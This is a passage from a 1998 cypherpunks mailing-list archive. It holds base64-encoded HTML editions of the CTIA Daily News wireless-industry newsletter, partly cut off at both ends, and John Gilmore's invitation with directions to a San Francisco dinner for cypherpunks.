TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPldhdGVy
IFRvd2VyIENlbGx1bGFyCkFudGVubmFzIFdhbnRlZDwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UcmF2ZXJzZSBDaXR5
LCBNaWNoLi1iYXNlZCBNUEkgV2lyZWxlc3MKaGFzIHN1Ym1pdHRlZCBhIHJl
cXVlc3QgdG8gY2l0eSBvZmZpY2lhbHMgYXNraW5nIGZvciB0aGUgcGVybWlz
c2lvbiB0bwplcmVjdCBhIDEwLWZvb3QgdG93ZXIgYXRvcCBhIHdhdGVyIHRv
d2VyIGluIEFsbWEsIE1pY2guIFRoZSBhbnRlbm5hIG9uCnRoZSB3YXRlciB0
b3dlciBpcyBsZXNzIGxpa2VseSB0byBjYXVzZSBwcm9ibGVtcy0tc3VjaCBh
cyBpbnRlcmZlcmVuY2UKd2l0aCBvdGhlciBjb21tdW5pY2F0aW9uIGRldmlj
ZXMgb3IgOTExIHJhZGlvIHNpZ25hbHMtLXRoYW4gYnVpbGRpbmcgYQpuZXcg
dG93ZXIgYWx0b2dldGhlciwgYWNjb3JkaW5nIHRvIHNvbWUgY2l0eSBvZmZp
Y2lhbHMuIFRoZSBpc3N1ZSB3aWxsCmJlIGFkZHJlc3NlZCBhdCB0aGUgVHVl
c2RheSwgQXVnLiAyNSBwYW5lbCBtZWV0aW5nLiBNUEkgaGFzIHN1Z2dlc3Rl
ZCBwYXlpbmcKJDYsNjAwIGEgeWVhciBhbmQgZXN0YWJsaXNoaW5nIGEgMTAt
eWVhciBjb250cmFjdC4gKDxBIEhSRUY9Imh0dHA6Ly9zYS5tbGl2ZS5jb20v
bmV3cy90b3dlci5odG0iPk1JQ0hJR0FOCkxJVkU8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5K
dXN0aWNlIERlcGFydG1lbnRzIFNheXMKVS5TLiBNYW51ZmFjdHVyZXJzJm5i
c3A7PEJSPgpNYXkgU2hhcmUgWTJLIFBsYW5zPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRoZSBEZXBhcnRtZW50IG9m
IEp1c3RpY2UgdG9sZCBtYW51ZmFjdHVyZXJzCnRoZXkgY291bGQgc2hhcmUg
aW5mb3JtYXRpb24gb24gcmVzb2x2aW5nIFllYXIgMjAwMCBjb21wdXRlciBp
c3N1ZXMgd2l0aG91dApydW5uaW5nIGFmb3VsIG9mIGFudGl0cnVzdCBsYXdz
LiZuYnNwOyBUaGUgTmF0aW9uYWwgQXNzb2NpYXRpb24gb2YgTWFudWZhY3R1
cmVycwpoYWQgc291Z2h0IGFwcHJvdmFsIG9mIGEgcGxhbiB0byBsZXQgaXRz
IDE0LDAwMCBtZW1iZXIgY29tcGFuaWVzIGFuZCB0aGVpcgpjb21wdXRlciBz
ZXJ2aWNlcyBzdXBwbGllcnMgZXhjaGFuZ2UgZGF0YSBvbiBmaXhpbmcgdGhl
IGNvbXB1dGVyIGRhdGUgcHJvYmxlbS4KKDxBIEhSRUY9Imh0dHA6Ly9kYWls
eW5ld3MueWFob28uY29tL2hlYWRsaW5lcy90Yy9zdG9yeS5odG1sP3M9di9u
bS8xOTk4MDgxNy90Yy95MmtfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PkNUSUEgQW5ub3VuY2VzIEVkdWNhdGlvbmFsClRyYWNrcyBmb3IgV0lSRUxF
U1MgSS5ULjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5UaGUgY29uZmVyZW5jZSBhbmQgZXhoaWJpdGlvbiBzcG9uc29y
ZWQKYnkgdGhlIENlbGx1bGFyIFRlbGVjb21tdW5pY2F0aW9ucyBJbmR1c3Ry
eSBBc3NvY2lhdGlvbiwgd2lsbCBmZWF0dXJlIGV4cGVydAptb2RlcmF0b3Jz
IGFuZCBwYW5lbGlzdHMgaW4gZWR1Y2F0aW9uYWwgdHJhY2tzLCBnZWFyZWQg
dG86IHByb2Zlc3Npb25hbHMKaW4gdGhlIGFyZWFzIG9mIGluZm9ybWF0aW9u
IHRlY2hub2xvZ3kgKElUKSwgaW5mb3JtYXRpb24gc3lzdGVtcyAoSVMpLApj
b3Jwb3JhdGUgZW5kIHVzZXJzLCB3aXJlbGVzcyBkZXZlbG9wZXJzLCBhZHZh
bmNlZCB3aXJlbGVzcywgdmFsdWUgYWRkZWQKcmVzYWxlcyAoVkFScyksIHdp
cmVsZXNzIGludGVncmF0aW9uLCByZXRhaWxpbmcsIHNtYWxsIG9mZmljZS9o
b21lIG9mZmljZQooU09ITyksIEludGVybmV0IHNlcnZpY2UgcHJvdmlzaW9u
LiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3By
b2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMjIx
Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VSBTIFdFU1QncyBDRU8gUmVhZHkK
dG8gRmlnaHQgVW5pb24gb24gUGVyZm9ybWFuY2UgVGFyZ2V0czwvRk9OVD48
L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5DRU8gU29s
b21vbiBUcnVqaWxsbyBzYWlkIHRoYXQgdGhlIG9ubHkKd2F5IGhpcyBjb21w
YW55IGNhbiBiZWF0IHVwc3RhcnQgcml2YWxzIGlzIGJ5IGJlaW5nIGZpcnN0
IHdpdGggbmV3IHNlcnZpY2VzLiZuYnNwOwpUbyBkbyB0aGF0LCBVIFMgV0VT
VCB3YW50cyB0byB0aWUgd29ya2Vycycgc2FsYXJpZXMgdG8gYWdncmVzc2l2
ZSBwZXJmb3JtYW5jZQp0YXJnZXRzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5i
bG9vbWJlcmcuY29tL25ld3MyLmNnaT9UPXRlY2huZXdzLmh0JnM9NTgxNjEy
OTExIj5CTE9PTUJFUkcKVEVDSE5PTE9HWSBORVdTPC9BPik8L0ZPTlQ+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
VHJpY29tIFNpZ25zIENvbnRyYWN0CndpdGggTW90b3JvbGEgZm9yIENETUEg
QnVpbGRvdXQmbmJzcDs8QlI+CmluIHRoZSBEb21pbmljYW4gUmVwdWJsaWM8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
TW90b3JvbGEncyBDZWxsdWxhciBJbmZyYXN0cnVjdHVyZSBHcm91cAooQ0lH
KSB3aWxsIHByb3ZpZGUgQ0RNQSAoQ29kZSBEaXZpc2lvbiBNdWx0aXBsZSBB
Y2Nlc3MpIHRlY2hub2xvZ3kgYW5kCmVxdWlwbWVudCBmb3IgVHJpY29tJ3Mg
V0xMIChXaXJlbGVzcyBMb2NhbCBMb29wKSBhbmQgUENTIGJ1aWxkb3V0IHBs
YW5zCmluIHRoZSBEb21pbmljYW4gUmVwdWJsaWMuICg8QSBIUkVGPSJodHRw
Oi8vYml6LnlhaG9vLmNvbS9wcm5ld3MvOTgwODE4L255X3RyaWNvbV9fMS5o
dG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkVyaWNzc29uIHRvIEJvb3N0IFJv
bGUKaW4gQnJhemlsPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPlRlbGVmb24gQUIgTC5NLiBFcmljc3NvbiBzdWJtaXR0
ZWQgYSBiaWQKb2YgJDY0MCBtaWxsaW9uIHRvIHB1cmNoYXNlIHNoYXJlcyBp
biBpdHMgQnJhemlsaWFuIHN1YnNpZGlhcnksIHdoaWNoIGl0CnByZXNlbnRs
eSBkb2VzIG5vdCBvd24uIEN1cnJlbnRseSBvd25pbmcgOTUgcGVyY2VudCBv
ZiB0aGUgdm90aW5nIHNoYXJlcwphbmQgNTEgcGVyY2VudCBvZiB0aGUgdG90
YWwgc2hhcmVzLCBFcmljc3NvbidzIHN0YWtlIGluIEVyaWNzc29uIFNBIHdp
bGwKZ3JvdyB0byA5OSBwZXJjZW50IGlmIHRoZSBiaWQgaXMgYWNjZXB0ZWQu
IFRoZSBiaWQgd2lsbCByZW1haW4gb3BlbiB1bnRpbApTZXB0LiAxNi4gRXJp
Y3Nzb24gaGFkICQxLjI1IGJpbGxpb24gaW4gMTk5NyBzYWxlcyBpbiBCcmF6
aWwuICg8QSBIUkVGPSJodHRwOi8vaW50ZXJhY3RpdmUud3NqLmNvbS9lZGl0
aW9uL2N1cnJlbnQvYXJ0aWNsZXMvU0I5MDMzNjU0MjA3MTQ2NjM1MDAuaHRt
Ij5XQUxMClNULiBKT1VSTkFMPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U2FuY3Rpb25zIFNs
b3cgSHVnaGVzJwpJbmRpYSBQaG9uZSBQbGFuczwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgaGVhZCBvZiB0aGUg
SW5kaWFuIHVuaXQgb2YgSHVnaGVzCkVsZWN0cm9uaWNzIENvcnAuIHNhaWQg
RnJpZGF5IFUuUy4gc2FuY3Rpb25zIGhhZCBkZWxheWVkIHRoZSBsYXVuY2gg
b2YKaXRzIHRlbGVwaG9uZSBzZXJ2aWNlIGluIEluZGlhLCBidXQgaXQgaG9w
ZWQgdG8gc3RhcnQgdXAgb3BlcmF0aW9ucyBieQp0aGUgZW5kIG9mIDE5OTgu
Jm5ic3A7ICg8QSBIUkVGPSJodHRwOi8vd3d3LmJvc3Rvbi5jb20vZGFpbHlu
ZXdzL3dpcmVodG1sLzIyOS9TYW5jdGlvbnNfc2xvd19IdWdoZXNfX0luZGlh
X3Bob25lXy5zaHRtbCI+Qk9TVE9OCkdMT0JFPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RGVh
dGggQ2FuJ3QgU2VwYXJhdGUKSXNyYWVsaSBUZWVuIGZyb20gTW9iaWxlIFBo
b25lPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPkFuIElzcmFlbGkgdGVlbmFnZXIncyBncmF2ZSBtYXJrZXIgaXMKYSBi
bGFjayBtYXJibGUgbW9kZWwgb2YgYSBtb2JpbGUgcGhvbmUsIHdpdGggYSBt
ZXNzYWdlIGluIHRoZSBkaXNwbGF5IHNheWluZywKIkhlbGxvLCB0aGlzIGlz
IEd1eSwgaG93IGFyZSB5b3UgZG9pbmc/IiAoPEEgSFJFRj0iaHR0cDovL2Rh
aWx5bmV3cy55YWhvby5jb20vaGVhZGxpbmVzL29kL3N0b3J5Lmh0bWw/cz12
L25tLzE5OTgwODEzL29kL3Bob25lXzEuaHRtbCI+WUFIT088L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
Pgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPS0xPkZvciBhZGRpdGlvbmFsIG5ld3MgYWJvdXQKdGhl
IHdpcmVsZXNzIGluZHVzdHJ5LS1pbmNsdWRpbmcgcGVyaW9kaWMgbmV3cyB1
cGRhdGVzIHRocm91Z2hvdXQgdGhlIGRheS0tdmlzaXQKPEEgSFJFRj0iaHR0
cDovL3d3dy53b3ctY29tLmNvbSI+aHR0cDovL3d3dy53b3ctY29tLmNvbS48
L0E+PC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkNUSUEgRGFpbHkgTmV3
cyBmcm9tIFdPVy1DT00KaXMgdHJhbnNtaXR0ZWQgd2Vla2RheXMsIGV4Y2Vw
dCBmb3IgaG9saWRheXMuIFZpc2l0IHVzIG9uIHRoZSBXb3JsZCBXaWRlCldl
YiBhdCA8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Np
b25hbCI+aHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWw8L0E+
LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+SWYgeW91IGFyZSBub3Qg
aW50ZXJlc3RlZAppbiByZWNlaXZpbmcgdGhlIENUSUEgRGFpbHkgTmV3cyBm
cm9tIFdPVy1DT00sIHBsZWFzZSBzZW5kIGEgbWVzc2FnZSB0bwo8QSBIUkVG
PSJtYWlsdG86dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWls
LmNvbSI+dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNv
bTwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxCPioqKjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT4gVGhl
IHRlcm0gInVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5j
b20iCm11c3QgYmUgbGlzdGVkIGluIHRoZSBUTyBzZWN0aW9uIG9mIHRoZSBl
bWFpbC48L0ZPTlQ+PC9GT05UPiAqKio8L0I+Jm5ic3A7Cgo8UD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+UGxlYXNlIE5v
dGU6IFNvbWUgb2YgdGhlCmxpbmtzIGluIHRvZGF5J3MgbmV3cyBhcmUgdGlt
ZSBzZW5zaXRpdmUuJm5ic3A7IFRob3NlIGxpbmtzIG1heSBub3QgYmUKYXZh
aWxhYmxlIGFzIG5ld3MgY2hhbmdlcyB0aHJvdWdob3V0IHRoZSBkYXkuJm5i
c3A7IEFsc28sIHNvbWUgbmV3cyBzb3VyY2VzCm1heSBiZSBzdWJzY3JpcHRp
b24tYmFzZWQgb3IgcmVxdWlyZSByZWdpc3RyYXRpb24uPC9GT05UPjwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
Pgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KPC9U
QUJMRT4KJm5ic3A7PC9jZW50ZXI+CjwvQk9EWT4KPC9IVE1MPgo=
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 21 Aug 1998 07:14:51 -0700 (PDT)
To: cypherpunks-announce, cryptography@c2.net
Subject: Announce: SF cypherpolitech dinner, Friday 21 Aug, 6pm: Khan Toke
Message-ID: <199808192139.OAA05632@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan (of fight-censorship/politech fame), Solveig (of those wacky
libertarians at the Cato Institute), and John (a reported maverick who
cracks codes) invite you to a San Francisco social dinner for
cypherpunks, politechnicals, and related species.  Declan and Solveig
are visiting SF briefly, and want to stir some of the locals out to a
watering hole.

We've reserved a room at a good Thai restaurant, full of sunken tables
and beautiful carved wood.  Please RSVP to Declan at <declan@well.com>
if you think you're coming; this will help us let the restaurant know
what to expect.  But if on Friday night you end up wanting to come,
come anyway, whether or not you RSVP'd.

The restaurant is:

	Khan Toke Thai Restaurant
	5937 Geary Blvd (at 24th Avenue).
	San Francisco, CA
	+1 415 668 6654
	Friday, 21 August 01998, 6:00PM

It's in the Richmond district of SF, out toward the ocean and north.
>From Marin, cross the bridge and take the first exit south toward
19th Avenue, which puts you on Park Presidio Ave.  Turn right on Geary
and go to 24th.  Park in the neighborhood.

>From I-280, take 19th Avenue, follow it north through the city and
through Golden Gate Park.  When you exit the park, you'll be on Park
Presidio Ave.  You can't turn left anywhere along there, so pass
Geary, and at the next block (Clement), take three rights instead.
Head west on Geary to 24th Avenue.

>From US-101 or I-80, get to SF and take the North 101 branch of the
freeway.  Take the Van Ness Avenue exit, go right at the bottom, snake
leftish across Mission and Market Streets, and you'll be going north
on Van Ness.  In about ten blocks, take a left on Geary.  Follow it
all the way to 24th Avenue.

>On transit, take the 38 Geary bus.  You can catch it at the BART
Montgomery station, or at the Transbay Terminal.

See you there!

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 19 Aug 1998 13:50:40 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 19, 1998
Message-ID: <199808192018.PAA14699@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/     for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00005.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00005.bin"
Content-Description: "_CTIA_Daily_News_19980819.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMTksIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPk5hdGlvbmFsIFBhcmsgU2VydmljZQpG
aW5hbGl6ZXMgUHJvY2VkdXJlcyBBcHBsaWNhYmxlJm5ic3A7PC9GT05UPjwv
Rk9OVD48L0I+CjxCUj48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+dG8gUGVybWl0dGluZyBXaXJlbGVzcwpUZWxlY29t
bXVuaWNhdGlvbnMgU2l0ZXMgaW4gVW5pdHMmbmJzcDs8L0ZPTlQ+PC9GT05U
PjwvQj4KPEJSPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZP
TlQgU0laRT0rMT5vZiBOYXRpb25hbCBQYXJrIFN5c3RlbTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgc2Vydmlj
ZS13aWRlIHByb2NlZHVyZXMgYXJlIHVuaXF1ZQp0byB3aXJlbGVzcyB0ZWxl
Y29tbXVuaWNhdGlvbnMgZmFjaWxpdHkgc2l0ZXMgYW5kIGFyZSBpbiBhZGRp
dGlvbiB0byBleGlzdGluZwpyaWdodC1vZi13YXkgcHJvY2VkdXJlcyBhbmQg
b3RoZXIgYXBwbGljYWJsZSBzZWN0aW9ucyBvZiBOYXRpb25hbCBQYXJrClNl
cnZpY2UgZ3VpZGVsaW5lcy4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNv
bS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4LmNm
bT9hcnRpY2xlaWQ9MzIyNyI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPk5UVERv
Q29NbyB0byBMYXVuY2ggQ2VsbHVsYXIKUGhvbmUgU2VydmljZXMmbmJzcDs8
L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT50byB0aGUgVW5pdGVkIFN0YXRlczwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5O
VFQgTW9iaWxlIENvbW11bmljYXRpb25zIE5ldHdvcmsgYW5ub3VuY2VkCmEg
bmV3IGNlbGx1bGFyIHBob25lIHByb2dyYW0gdGhhdCB3aWxsIGFsbG93IHVz
ZXJzIGluIEphcGFuIHRvIG1ha2UgZGlyZWN0CmNhbGxzIHRvIHRoZSBVbml0
ZWQgU3RhdGVzLiBVc2VycyBtdXN0IHNpZ24gdXAgdG8gdXNlIHRoZSBuZXcg
c2VydmljZTsKaG93ZXZlciwgaXQgY29zdHMgbm90aGluZyB0byByZWdpc3Rl
ci4gQ2hhcmdpbmcgMjUgcGVyY2VudCBsZXNzIHRoYW4gdGhlCmN1cnJlbnQg
ZmVlIGZvciBpbnRlcm5hdGlvbmFsIGNhbGxzLCBOVFQgaW50ZW5kcyB0byBi
ZWdpbiBzZXJ2aWNlIHRvIHByb3ZpZGUKZGlyZWN0IGNhbGxzIHRvIEphcGFu
IGZyb20gY2VsbHVsYXIgcGhvbmUgdXNlcnMgaW4gdGhlIFVuaXRlZCBTdGF0
ZXMgbmV4dAp5ZWFyLCB3aGljaCBpdCB3aWxsIHNldCB1cCB3aXRoIHRoZSBo
ZWxwIG9mIEFUJmFtcDtUIFdpcmVsZXNzLiAoPEEgSFJFRj0iaHR0cDovL2Jp
ei55YWhvby5jb20vZmluYW5jZS85ODA4MTgvbnR0X2RvY29tb18xLmh0bWwi
PllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9KzE+T2tpIEVsZWN0cmljIFN0b3BzIE1ha2lu
ZwpDZWxsIFBob25lcyBpbiBVLlMuPC9GT05UPjwvRk9OVD48L0I+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk1vcmUgaW50ZW5zZSBjb21wZXRpdGlv
biBhbmQgdGhlIGVudHJ5Cm9mIGRpZ2l0YWwgcGhvbmVzIGNhdXNlZCBwcm9m
aXRzIHRvIGZhbGwgYXQgdGhlIHdob2xseSBvd25lZCBVLlMuIHN1YnNpZGlh
